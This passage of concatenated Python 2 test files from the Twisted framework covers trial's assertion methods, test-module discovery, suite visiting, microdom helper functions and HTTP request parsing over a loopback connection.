message appropriate for the type of error
@type printStatus: Boolean
"""
def addSuccess(test):
"""Record that test passed."""
```
#### File: trial/test/test_assertions.py
```python
import StringIO
from twisted.python import reflect, failure
from twisted.python.util import dsu
from twisted.internet import defer
from twisted.trial import unittest, runner, reporter
class MockEquality(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "MockEquality(%s)" % (self.name,)
def __eq__(self, other):
if not hasattr(other, 'name'):
raise ValueError("%r not comparable to %r" % (other, self))
return self.name[0] == other.name[0]
class TestAssertions(unittest.TestCase):
"""Tests for TestCase's assertion methods. That is, failUnless*,
failIf*, assert*.
This is pretty paranoid. Still, a certain paranoia is healthy if you
are testing a unit testing framework.
"""
class FailingTest(unittest.TestCase):
def test_fails(self):
raise self.failureException()
def testFail(self):
try:
self.fail("failed")
except self.failureException, e:
if not str(e) == 'failed':
                raise self.failureException("Exception had msg %s instead of %s"
                                            % (str(e), 'failed'))
else:
raise self.failureException("Call to self.fail() didn't fail test")
def test_failingException_fails(self):
test = runner.TestLoader().loadClass(TestAssertions.FailingTest)
io = StringIO.StringIO()
result = reporter.TestResult()
test.run(result)
self.failIf(result.wasSuccessful())
self.failUnlessEqual(result.errors, [])
self.failUnlessEqual(len(result.failures), 1)
def test_failIf(self):
for notTrue in [0, 0.0, False, None, (), []]:
self.failIf(notTrue, "failed on %r" % (notTrue,))
for true in [1, True, 'cat', [1,2], (3,4)]:
try:
self.failIf(true, "failed on %r" % (true,))
except self.failureException, e:
self.failUnlessEqual(str(e), "failed on %r" % (true,))
else:
self.fail("Call to failIf(%r) didn't fail" % (true,))
def test_failUnless(self):
for notTrue in [0, 0.0, False, None, (), []]:
try:
self.failUnless(notTrue, "failed on %r" % (notTrue,))
except self.failureException, e:
self.failUnlessEqual(str(e), "failed on %r" % (notTrue,))
else:
self.fail("Call to failUnless(%r) didn't fail" % (notTrue,))
for true in [1, True, 'cat', [1,2], (3,4)]:
self.failUnless(true, "failed on %r" % (true,))
def _testEqualPair(self, first, second):
x = self.failUnlessEqual(first, second)
if x != first:
self.fail("failUnlessEqual should return first parameter")
def _testUnequalPair(self, first, second):
try:
self.failUnlessEqual(first, second)
except self.failureException, e:
expected = '%r != %r' % (first, second)
if str(e) != expected:
self.fail("Expected: %r; Got: %s" % (expected, str(e)))
else:
self.fail("Call to failUnlessEqual(%r, %r) didn't fail"
% (first, second))
def test_failUnlessEqual_basic(self):
self._testEqualPair('cat', 'cat')
self._testUnequalPair('cat', 'dog')
self._testEqualPair([1], [1])
self._testUnequalPair([1], 'orange')
def test_failUnlessEqual_custom(self):
x = MockEquality('first')
y = MockEquality('second')
z = MockEquality('fecund')
self._testEqualPair(x, x)
self._testEqualPair(x, z)
self._testUnequalPair(x, y)
self._testUnequalPair(y, z)
def test_failUnlessEqual_incomparable(self):
apple = MockEquality('apple')
orange = ['orange']
try:
self.failUnlessEqual(apple, orange)
except self.failureException:
self.fail("Fail raised when ValueError ought to have been raised.")
except ValueError:
# good. error not swallowed
pass
else:
self.fail("Comparing %r and %r should have raised an exception"
% (apple, orange))
def _raiseError(self, error):
raise error
def test_failUnlessRaises_expected(self):
x = self.failUnlessRaises(ValueError, self._raiseError, ValueError)
self.failUnless(isinstance(x, ValueError),
"Expect failUnlessRaises to return instance of raised "
"exception.")
def test_failUnlessRaises_unexpected(self):
try:
self.failUnlessRaises(ValueError, self._raiseError, TypeError)
except TypeError:
self.fail("failUnlessRaises shouldn't re-raise unexpected "
"exceptions")
except self.failureException, e:
# what we expect
pass
else:
self.fail("Expected exception wasn't raised. Should have failed")
def test_failUnlessRaises_noException(self):
try:
self.failUnlessRaises(ValueError, lambda : None)
except self.failureException, e:
self.failUnlessEqual(str(e),
'ValueError not raised (None returned)')
else:
self.fail("Exception not raised. Should have failed")
def test_failUnlessRaises_failureException(self):
x = self.failUnlessRaises(self.failureException, self._raiseError,
self.failureException)
self.failUnless(isinstance(x, self.failureException),
"Expected %r instance to be returned"
% (self.failureException,))
try:
x = self.failUnlessRaises(self.failureException, self._raiseError,
ValueError)
except self.failureException, e:
# what we expect
pass
else:
self.fail("Should have raised exception")
def test_failIfEqual_basic(self):
x, y, z = [1], [2], [1]
ret = self.failIfEqual(x, y)
self.failUnlessEqual(ret, x,
"failIfEqual should return first parameter")
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, x)
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, z)
def test_failIfEqual_customEq(self):
x = MockEquality('first')
y = MockEquality('second')
z = MockEquality('fecund')
ret = self.failIfEqual(x, y)
self.failUnlessEqual(ret, x,
"failIfEqual should return first parameter")
self.failUnlessRaises(self.failureException,
self.failIfEqual, x, x)
# test when __ne__ is not defined
self.failIfEqual(x, z, "__ne__ not defined, so not equal")
def test_failUnlessIdentical(self):
x, y, z = [1], [1], [2]
ret = self.failUnlessIdentical(x, x)
self.failUnlessEqual(ret, x,
'failUnlessIdentical should return first '
'parameter')
self.failUnlessRaises(self.failureException,
self.failUnlessIdentical, x, y)
self.failUnlessRaises(self.failureException,
self.failUnlessIdentical, x, z)
def test_failUnlessApproximates(self):
x, y, z = 1.0, 1.1, 1.2
self.failUnlessApproximates(x, x, 0.2)
ret = self.failUnlessApproximates(x, y, 0.2)
self.failUnlessEqual(ret, x, "failUnlessApproximates should return "
"first parameter")
self.failUnlessRaises(self.failureException,
self.failUnlessApproximates, x, z, 0.1)
self.failUnlessRaises(self.failureException,
self.failUnlessApproximates, x, y, 0.1)
def test_failUnlessAlmostEqual(self):
precision = 5
x = 8.000001
y = 8.00001
z = 8.000002
self.failUnlessAlmostEqual(x, x, precision)
ret = self.failUnlessAlmostEqual(x, z, precision)
self.failUnlessEqual(ret, x, "failUnlessAlmostEqual should return "
"first parameter (%r, %r)" % (ret, x))
self.failUnlessRaises(self.failureException,
self.failUnlessAlmostEqual, x, y, precision)
def test_failIfAlmostEqual(self):
precision = 5
x = 8.000001
y = 8.00001
z = 8.000002
ret = self.failIfAlmostEqual(x, y, precision)
self.failUnlessEqual(ret, x, "failIfAlmostEqual should return "
"first parameter (%r, %r)" % (ret, x))
self.failUnlessRaises(self.failureException,
self.failIfAlmostEqual, x, x, precision)
self.failUnlessRaises(self.failureException,
self.failIfAlmostEqual, x, z, precision)
def test_failUnlessSubstring(self):
x = "cat"
y = "the dog sat"
z = "the cat sat"
self.failUnlessSubstring(x, x)
ret = self.failUnlessSubstring(x, z)
self.failUnlessEqual(ret, x, 'should return first parameter')
self.failUnlessRaises(self.failureException,
self.failUnlessSubstring, x, y)
self.failUnlessRaises(self.failureException,
self.failUnlessSubstring, z, x)
def test_failIfSubstring(self):
x = "cat"
y = "the dog sat"
z = "the cat sat"
self.failIfSubstring(z, x)
ret = self.failIfSubstring(x, y)
self.failUnlessEqual(ret, x, 'should return first parameter')
self.failUnlessRaises(self.failureException,
self.failIfSubstring, x, x)
self.failUnlessRaises(self.failureException,
self.failIfSubstring, x, z)
def test_assertFailure(self):
d = defer.maybeDeferred(lambda: 1/0)
return self.assertFailure(d, ZeroDivisionError)
def test_assertFailure_wrongException(self):
d = defer.maybeDeferred(lambda: 1/0)
self.assertFailure(d, OverflowError)
d.addCallbacks(lambda x: self.fail('Should have failed'),
lambda x: x.trap(self.failureException))
return d
def test_assertFailure_noException(self):
d = defer.succeed(None)
self.assertFailure(d, ZeroDivisionError)
d.addCallbacks(lambda x: self.fail('Should have failed'),
lambda x: x.trap(self.failureException))
return d
def test_assertFailure_moreInfo(self):
"""In the case of assertFailure failing, check that we get lots of
information about the exception that was raised.
"""
try:
1/0
except ZeroDivisionError:
f = failure.Failure()
d = defer.fail(f)
d = self.assertFailure(d, RuntimeError)
d.addErrback(self._checkInfo, f)
return d
def _checkInfo(self, assertionFailure, f):
assert assertionFailure.check(self.failureException)
output = assertionFailure.getErrorMessage()
self.assertIn(f.getErrorMessage(), output)
self.assertIn(f.getBriefTraceback(), output)
def test_assertFailure_masked(self):
"""A single wrong assertFailure should fail the whole test.
"""
class ExampleFailure(Exception):
pass
class TC(unittest.TestCase):
failureException = ExampleFailure
def test_assertFailure(self):
d = defer.maybeDeferred(lambda: 1/0)
self.assertFailure(d, OverflowError)
self.assertFailure(d, ZeroDivisionError)
return d
test = TC('test_assertFailure')
result = reporter.TestResult()
test.run(result)
self.assertEqual(1, len(result.failures))
class TestAssertionNames(unittest.TestCase):
"""Tests for consistency of naming within TestCase assertion methods
"""
def _getAsserts(self):
dct = {}
reflect.accumulateMethods(self, dct, 'assert')
return [ dct[k] for k in dct if not k.startswith('Not') and k != '_' ]
def _name(self, x):
return x.__name__
def test_failUnless_matches_assert(self):
asserts = self._getAsserts()
failUnlesses = reflect.prefixedMethods(self, 'failUnless')
self.failUnlessEqual(dsu(asserts, self._name),
dsu(failUnlesses, self._name))
def test_failIf_matches_assertNot(self):
asserts = reflect.prefixedMethods(unittest.TestCase, 'assertNot')
failIfs = reflect.prefixedMethods(unittest.TestCase, 'failIf')
self.failUnlessEqual(dsu(asserts, self._name),
dsu(failIfs, self._name))
def test_equalSpelling(self):
for name, value in vars(self).items():
if not callable(value):
continue
if name.endswith('Equal'):
self.failUnless(hasattr(self, name+'s'),
"%s but no %ss" % (name, name))
self.failUnlessEqual(value, getattr(self, name+'s'))
if name.endswith('Equals'):
self.failUnless(hasattr(self, name[:-1]),
"%s but no %s" % (name, name[:-1]))
self.failUnlessEqual(value, getattr(self, name[:-1]))
```
#### File: trial/test/test_script.py
```python
import StringIO, sys, sets
from twisted.trial import unittest, runner
from twisted.scripts import trial
from twisted.python import util
from twisted.trial.test.test_loader import testNames
def sibpath(filename):
"""For finding files in twisted/trial/test"""
return util.sibpath(__file__, filename)
class TestGarbageCollect(unittest.TestCase):
def setUp(self):
self.config = trial.Options()
def test_forcedGc(self):
"""
Passing the '--force-gc' option to the trial script should set the
appropriate flag in the test loader.
"""
self.config['force-gc'] = True
loader = trial._getLoader(self.config)
self.assertEqual(True, loader.forceGarbageCollection)
def test_unforcedGc(self):
"""
The test loader should only enable forced garbage collection if the
option is passed to the trial script.
"""
loader = trial._getLoader(self.config)
self.assertEqual(False, loader.forceGarbageCollection)
class TestModuleTest(unittest.TestCase):
def setUp(self):
self.config = trial.Options()
def tearDown(self):
self.config = None
def test_testNames(self):
"""
Check that the testNames helper method accurately collects the
names of tests in suite.
"""
self.assertEqual(testNames(self), [self.id()])
def assertSuitesEqual(self, test1, names):
loader = runner.TestLoader()
names1 = testNames(test1)
names2 = testNames(runner.TestSuite(map(loader.loadByName, names)))
names1.sort()
names2.sort()
self.assertEqual(names1, names2)
def test_baseState(self):
self.failUnlessEqual(0, len(self.config['tests']))
def test_testmoduleOnModule(self):
"""
Check that --testmodule loads a suite which contains the tests
referred to in test-case-name inside its parameter.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleTwice(self):
"""
When the same module is specified with two --testmodule flags, it
should only appear once in the suite.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.config.opt_testmodule(sibpath('moduletest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleOnSourceAndTarget(self):
"""
If --testmodule is specified twice, once for module A and once for
a module which refers to module A, then make sure module A is only
added once.
"""
self.config.opt_testmodule(sibpath('moduletest.py'))
self.config.opt_testmodule(sibpath('test_test_visitor.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor'])
def test_testmoduleOnSelfModule(self):
"""
When given a module that refers to *itself* in the test-case-name
variable, check that --testmodule only adds the tests once.
"""
self.config.opt_testmodule(sibpath('moduleself.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.moduleself'])
def test_testmoduleOnScript(self):
"""
Check that --testmodule loads tests referred to in test-case-name
buffer variables.
"""
self.config.opt_testmodule(sibpath('scripttest.py'))
self.assertSuitesEqual(trial._getSuite(self.config),
['twisted.trial.test.test_test_visitor',
'twisted.trial.test.test_class'])
def test_testmoduleOnNonexistentFile(self):
"""
Check that --testmodule displays a meaningful error message when
passed a non-existent filename.
"""
buffy = StringIO.StringIO()
stderr, sys.stderr = sys.stderr, buffy
filename = 'test_thisbetternoteverexist.py'
try:
self.config.opt_testmodule(filename)
self.failUnlessEqual(0, len(self.config['tests']))
self.failUnlessEqual("File %r doesn't exist\n" % (filename,),
buffy.getvalue())
finally:
sys.stderr = stderr
def test_testmoduleOnEmptyVars(self):
"""
Check that --testmodule adds no tests to the suite for modules
which lack test-case-name buffer variables.
"""
self.config.opt_testmodule(sibpath('novars.py'))
self.failUnlessEqual(0, len(self.config['tests']))
def test_testmoduleOnModuleName(self):
"""
Check that --testmodule does *not* support module names as arguments
and that it displays a meaningful error message.
"""
buffy = StringIO.StringIO()
stderr, sys.stderr = sys.stderr, buffy
moduleName = 'twisted.trial.test.test_script'
try:
self.config.opt_testmodule(moduleName)
self.failUnlessEqual(0, len(self.config['tests']))
self.failUnlessEqual("File %r doesn't exist\n" % (moduleName,),
buffy.getvalue())
finally:
sys.stderr = stderr
def test_parseLocalVariable(self):
declaration = '-*- test-case-name: twisted.trial.test.test_tests -*-'
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_trailingSemicolon(self):
declaration = '-*- test-case-name: twisted.trial.test.test_tests; -*-'
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_parseLocalVariables(self):
declaration = ('-*- test-case-name: twisted.trial.test.test_tests; '
'foo: bar -*-')
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests',
'foo': 'bar'},
localVars)
def test_surroundingGuff(self):
declaration = ('## -*- test-case-name: '
'twisted.trial.test.test_tests -*- #')
localVars = trial._parseLocalVariables(declaration)
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_tests'},
localVars)
def test_invalidLine(self):
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'foo')
def test_invalidDeclaration(self):
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo -*-')
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo: bar; qux -*-')
self.failUnlessRaises(ValueError, trial._parseLocalVariables,
'-*- foo: bar: baz; qux: qax -*-')
def test_variablesFromFile(self):
localVars = trial.loadLocalVariables(sibpath('moduletest.py'))
self.failUnlessEqual({'test-case-name':
'twisted.trial.test.test_test_visitor'},
localVars)
def test_noVariablesInFile(self):
localVars = trial.loadLocalVariables(sibpath('novars.py'))
self.failUnlessEqual({}, localVars)
def test_variablesFromScript(self):
localVars = trial.loadLocalVariables(sibpath('scripttest.py'))
self.failUnlessEqual(
{'test-case-name': ('twisted.trial.test.test_test_visitor,'
'twisted.trial.test.test_class')},
localVars)
def test_getTestModules(self):
modules = trial.getTestModules(sibpath('moduletest.py'))
self.failUnlessEqual(modules, ['twisted.trial.test.test_test_visitor'])
def test_getTestModules_noVars(self):
modules = trial.getTestModules(sibpath('novars.py'))
self.failUnlessEqual(len(modules), 0)
def test_getTestModules_multiple(self):
modules = trial.getTestModules(sibpath('scripttest.py'))
self.failUnlessEqual(sets.Set(modules),
sets.Set(['twisted.trial.test.test_test_visitor',
'twisted.trial.test.test_class']))
def test_looksLikeTestModule(self):
for filename in ['test_script.py', 'twisted/trial/test/test_script.py']:
self.failUnless(trial.isTestFile(filename),
"%r should be a test file" % (filename,))
for filename in ['twisted/trial/test/moduletest.py',
sibpath('scripttest.py'), sibpath('test_foo.bat')]:
self.failIf(trial.isTestFile(filename),
"%r should *not* be a test file" % (filename,))
```
#### File: trial/test/test_test_visitor.py
```python
from twisted.trial import unittest
from twisted.trial.runner import TestSuite, suiteVisit
pyunit = __import__('unittest')
class MockVisitor(object):
def __init__(self):
self.calls = []
def __call__(self, testCase):
self.calls.append(testCase)
class TestTestVisitor(unittest.TestCase):
def setUp(self):
self.visitor = MockVisitor()
def test_visitCase(self):
"""
Test that C{visit} works for a single test case.
"""
testCase = TestTestVisitor('test_visitCase')
testCase.visit(self.visitor)
self.assertEqual(self.visitor.calls, [testCase])
def test_visitSuite(self):
"""
Test that C{visit} hits all tests in a suite.
"""
tests = [TestTestVisitor('test_visitCase'),
TestTestVisitor('test_visitSuite')]
testSuite = TestSuite(tests)
testSuite.visit(self.visitor)
self.assertEqual(self.visitor.calls, tests)
def test_visitEmptySuite(self):
"""
Test that C{visit} on an empty suite hits nothing.
"""
TestSuite().visit(self.visitor)
self.assertEqual(self.visitor.calls, [])
def test_visitNestedSuite(self):
"""
Test that C{visit} recurses through suites.
"""
tests = [TestTestVisitor('test_visitCase'),
TestTestVisitor('test_visitSuite')]
testSuite = TestSuite([TestSuite([test]) for test in tests])
testSuite.visit(self.visitor)
self.assertEqual(self.visitor.calls, tests)
def test_visitPyunitSuite(self):
"""
Test that C{suiteVisit} visits stdlib unittest suites
"""
test = TestTestVisitor('test_visitPyunitSuite')
suite = pyunit.TestSuite([test])
suiteVisit(suite, self.visitor)
self.assertEqual(self.visitor.calls, [test])
def test_visitPyunitCase(self):
"""
Test that a stdlib test case in a suite gets visited.
"""
class PyunitCase(pyunit.TestCase):
def test_foo(self):
pass
test = PyunitCase('test_foo')
TestSuite([test]).visit(self.visitor)
self.assertEqual(self.visitor.calls, [test])
```
#### File: web/test/test_domhelpers.py
```python
from twisted.trial.unittest import TestCase
from twisted.web import microdom
from twisted.web import domhelpers
class DomHelpersTest(TestCase):
def test_getElementsByTagName(self):
doc1=microdom.parseString('<foo/>')
actual=domhelpers.getElementsByTagName(doc1, 'foo')[0].nodeName
expected='foo'
self.assertEquals(actual, expected)
el1=doc1.documentElement
actual=domhelpers.getElementsByTagName(el1, 'foo')[0].nodeName
self.assertEqual(actual, expected)
doc2_xml='<a><foo in="a"/><b><foo in="b"/></b><c><foo in="c"/></c><foo in="d"/><foo in="ef"/><g><foo in="g"/><h><foo in="h"/></h></g></a>'
doc2=microdom.parseString(doc2_xml)
tag_list=domhelpers.getElementsByTagName(doc2, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
expected='abcdefgh'
self.assertEquals(actual, expected)
el2=doc2.documentElement
tag_list=domhelpers.getElementsByTagName(el2, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
self.assertEqual(actual, expected)
doc3_xml='''
<a><foo in="a"/>
<b><foo in="b"/>
<d><foo in="d"/>
<g><foo in="g"/></g>
<h><foo in="h"/></h>
</d>
<e><foo in="e"/>
<i><foo in="i"/></i>
</e>
</b>
<c><foo in="c"/>
<f><foo in="f"/>
<j><foo in="j"/></j>
</f>
</c>
</a>'''
doc3=microdom.parseString(doc3_xml)
tag_list=domhelpers.getElementsByTagName(doc3, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
expected='abdgheicfj'
self.assertEquals(actual, expected)
el3=doc3.documentElement
tag_list=domhelpers.getElementsByTagName(el3, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
self.assertEqual(actual, expected)
doc4_xml='<foo><bar></bar><baz><foo/></baz></foo>'
doc4=microdom.parseString(doc4_xml)
actual=domhelpers.getElementsByTagName(doc4, 'foo')
root=doc4.documentElement
expected=[root, root.lastChild().firstChild()]
self.assertEquals(actual, expected)
actual=domhelpers.getElementsByTagName(root, 'foo')
self.assertEqual(actual, expected)
def test_gatherTextNodes(self):
doc1=microdom.parseString('<a>foo</a>')
actual=domhelpers.gatherTextNodes(doc1)
expected='foo'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc1.documentElement)
self.assertEqual(actual, expected)
doc2_xml='<a>a<b>b</b><c>c</c>def<g>g<h>h</h></g></a>'
doc2=microdom.parseString(doc2_xml)
actual=domhelpers.gatherTextNodes(doc2)
expected='abcdefgh'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc2.documentElement)
self.assertEqual(actual, expected)
doc3_xml=('<a>a<b>b<d>d<g>g</g><h>h</h></d><e>e<i>i</i></e></b>' +
'<c>c<f>f<j>j</j></f></c></a>')
doc3=microdom.parseString(doc3_xml)
actual=domhelpers.gatherTextNodes(doc3)
expected='abdgheicfj'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc3.documentElement)
self.assertEqual(actual, expected)
doc4_xml='''<html>
<head>
</head>
<body>
stuff
</body>
</html>
'''
doc4=microdom.parseString(doc4_xml)
actual=domhelpers.gatherTextNodes(doc4)
expected='\n stuff\n '
assert actual==expected, 'expected %s, got %s' % (expected, actual)
actual=domhelpers.gatherTextNodes(doc4.documentElement)
self.assertEqual(actual, expected)
doc5_xml='<x>Soufflé</x>'
doc5=microdom.parseString(doc5_xml)
actual=domhelpers.gatherTextNodes(doc5)
expected='Soufflé'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc5.documentElement)
self.assertEqual(actual, expected)
def test_clearNode(self):
doc1=microdom.parseString('<a><b><c><d/></c></b></a>')
a_node=doc1.documentElement
domhelpers.clearNode(a_node)
actual=doc1.documentElement.toxml()
expected='<a></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
doc2=microdom.parseString('<a><b><c><d/></c></b></a>')
b_node=doc2.documentElement.childNodes[0]
domhelpers.clearNode(b_node)
actual=doc2.documentElement.toxml()
expected='<a><b></b></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
doc3=microdom.parseString('<a><b><c><d/></c></b></a>')
c_node=doc3.documentElement.childNodes[0].childNodes[0]
domhelpers.clearNode(c_node)
actual=doc3.documentElement.toxml()
expected='<a><b><c></c></b></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_get(self):
doc1=microdom.parseString('<a><b id="bar"/><c class="foo"/></a>')
node=domhelpers.get(doc1, "foo")
actual=node.toxml()
expected='<c class="foo"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node=domhelpers.get(doc1, "bar")
actual=node.toxml()
expected='<b id="bar"></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
self.assertRaises(domhelpers.NodeLookupError,
domhelpers.get,
doc1,
"pzork")
def test_getIfExists(self):
doc1=microdom.parseString('<a><b id="bar"/><c class="foo"/></a>')
node=domhelpers.getIfExists(doc1, "foo")
actual=node.toxml()
expected='<c class="foo"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node=domhelpers.getIfExists(doc1, "pzork")
assert node==None, 'expected None, didn\'t get None'
def test_getAndClear(self):
doc1=microdom.parseString('<a><b id="foo"><c></c></b></a>')
node=domhelpers.getAndClear(doc1, "foo")
actual=node.toxml()
expected='<b id="foo"></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_locateNodes(self):
doc1=microdom.parseString('<a><b foo="olive"><c foo="olive"/></b><d foo="poopy"/></a>')
node_list=domhelpers.locateNodes(doc1.childNodes, 'foo', 'olive',
noNesting=1)
actual=''.join([node.toxml() for node in node_list])
expected='<b foo="olive"><c foo="olive"></c></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node_list=domhelpers.locateNodes(doc1.childNodes, 'foo', 'olive',
noNesting=0)
actual=''.join([node.toxml() for node in node_list])
expected='<b foo="olive"><c foo="olive"></c></b><c foo="olive"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_getParents(self):
doc1=microdom.parseString('<a><b><c><d/></c><e/></b><f/></a>')
node_list=domhelpers.getParents(doc1.childNodes[0].childNodes[0].childNodes[0])
actual=''.join([node.tagName for node in node_list
if hasattr(node, 'tagName')])
expected='cba'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_findElementsWithAttribute(self):
doc1=microdom.parseString('<a foo="1"><b foo="2"/><c foo="1"/><d/></a>')
node_list=domhelpers.findElementsWithAttribute(doc1, 'foo')
actual=''.join([node.tagName for node in node_list])
expected='abc'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node_list=domhelpers.findElementsWithAttribute(doc1, 'foo', '1')
actual=''.join([node.tagName for node in node_list])
expected='ac'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_findNodesNamed(self):
doc1=microdom.parseString('<doc><foo/><bar/><foo>a</foo></doc>')
node_list=domhelpers.findNodesNamed(doc1, 'foo')
actual=len(node_list)
expected=2
assert actual==expected, 'expected %d, got %d' % (expected, actual)
# NOT SURE WHAT THESE ARE SUPPOSED TO DO..
# def test_RawText FIXME
# def test_superSetAttribute FIXME
# def test_superPrependAttribute FIXME
# def test_superAppendAttribute FIXME
# def test_substitute FIXME
def test_escape(self):
j='this string " contains many & characters> xml< won\'t like'
expected='this string " contains many & characters> xml< won\'t like'
self.assertEqual(domhelpers.escape(j), expected)
def test_unescape(self):
j='this string " has && entities > < and some characters xml won\'t like<'
expected='this string " has && entities > < and some characters xml won\'t like<'
self.assertEqual(domhelpers.unescape(j), expected)
```
#### File: web/test/test_http.py
```python
from __future__ import nested_scopes
from twisted.trial import unittest
from twisted.web import http
from twisted.protocols import loopback
from twisted.internet import protocol
from twisted.test.test_protocols import StringIOWithoutClosing
import string, random, urllib, cgi
class DateTimeTest(unittest.TestCase):
"""Test date parsing functions."""
def testRoundtrip(self):
for i in range(10000):
time = random.randint(0, 2000000000)
timestr = http.datetimeToString(time)
time2 = http.stringToDatetime(timestr)
self.assertEquals(time, time2)
class OrderedDict:
def __init__(self, dict):
self.dict = dict
self.l = dict.keys()
def __setitem__(self, k, v):
self.l.append(k)
self.dict[k] = v
def __getitem__(self, k):
return self.dict[k]
def items(self):
result = []
for i in self.l:
result.append((i, self.dict[i]))
return result
def __getattr__(self, attr):
return getattr(self.dict, attr)
class DummyHTTPHandler(http.Request):
def process(self):
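        # Echo what the channel parsed back to the client: the body has the
        # form '''\n<content-length>\n<request body>''' and the Request,
        # Command and Version headers record the URI, method and protocol.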
self.headers = OrderedDict(self.headers)
self.content.seek(0, 0)
data = self.content.read()
length = self.getHeader('content-length')
request = "'''\n"+str(length)+"\n"+data+"'''\n"
self.setResponseCode(200)
self.setHeader("Request", self.uri)
self.setHeader("Command", self.method)
self.setHeader("Version", self.clientproto)
self.setHeader("Content-Length", len(request))
self.write(request)
self.finish()
class LoopbackHTTPClient(http.HTTPClient):
def connectionMade(self):
self.sendCommand("GET", "/foo/bar")
self.sendHeader("Content-Length", 10)
self.endHeaders()
self.transport.write("0123456789")
class HTTP1_0TestCase(unittest.TestCase):
requests = '''\
GET / HTTP/1.0
GET / HTTP/1.1
Accept: text/html
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.0 200 OK\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.0\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012"
def testBuffer(self):
b = StringIOWithoutClosing()
a = http.HTTPChannel()
a.requestFactory = DummyHTTPHandler
a.makeConnection(protocol.FileWrapper(b))
# one byte at a time, to stress it.
for byte in self.requests:
a.dataReceived(byte)
a.connectionLost(IOError("all one"))
value = b.getvalue()
if value != self.expected_response:
for i in range(len(value)):
if len(self.expected_response) <= i:
print `value[i-5:i+10]`, `self.expected_response[i-5:i+10]`
elif value[i] != self.expected_response[i]:
print `value[i-5:i+10]`, `self.expected_response[i-5:i+10]`
break
print '---VALUE---'
print repr(value)
print '---EXPECTED---'
print repr(self.expected_response)
raise AssertionError
class HTTP1_1TestCase(HTTP1_0TestCase):
requests = '''\
GET / HTTP/1.1
Accept: text/html
POST / HTTP/1.1
Content-Length: 10
0123456789POST / HTTP/1.1
Content-Length: 10
0123456789HEAD / HTTP/1.1
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 200 OK\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: POST\015\012Version: HTTP/1.1\015\012Content-length: 21\015\012\015\012'''\01210\0120123456789'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: POST\015\012Version: HTTP/1.1\015\012Content-length: 21\015\012\015\012'''\01210\0120123456789'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: HEAD\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012"
class HTTP1_1_close_TestCase(HTTP1_0TestCase):
requests = '''\
GET / HTTP/1.1
Accept: text/html
Connection: close
GET / HTTP/1.0
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 200 OK\015\012Connection: close\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012"
class HTTP0_9TestCase(HTTP1_0TestCase):
requests = '''\
GET /
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 400 Bad Request\r\n\r\n"
class HTTPLoopbackTestCase(unittest.TestCase):
expectedHeaders = {'request' : '/foo/bar',
'command' : 'GET',
'version' : 'HTTP/1.0',
'content-length' : '21'}
numHeaders = 0
gotStatus = 0
gotResponse = 0
gotEndHeaders = 0
def _handleStatus(self, version, status, message):
self.gotStatus = 1
self.assertEquals(version, "HTTP/1.0")
self.assertEquals(status, "200")
def _handleResponse(self, data):
self.gotResponse = 1
self.assertEquals(data, "'''\n10\n0123456789'''\n")
def _handleHeader(self, key, value):
self.numHeaders = self.numHeaders + 1
self.assertEquals(self.expectedHeaders[string.lower(key)], value)
def _handleEndHeaders(self):
self.gotEndHeaders = 1
self.assertEquals(self.numHeaders, 4)
def testLoopback(self):
server = http.HTTPChannel()
server.requestFactory = DummyHTTPHandler
client = LoopbackHTTPClient()
client.handleResponse = self._handleResponse
client.handleHeader = self._handleHeader
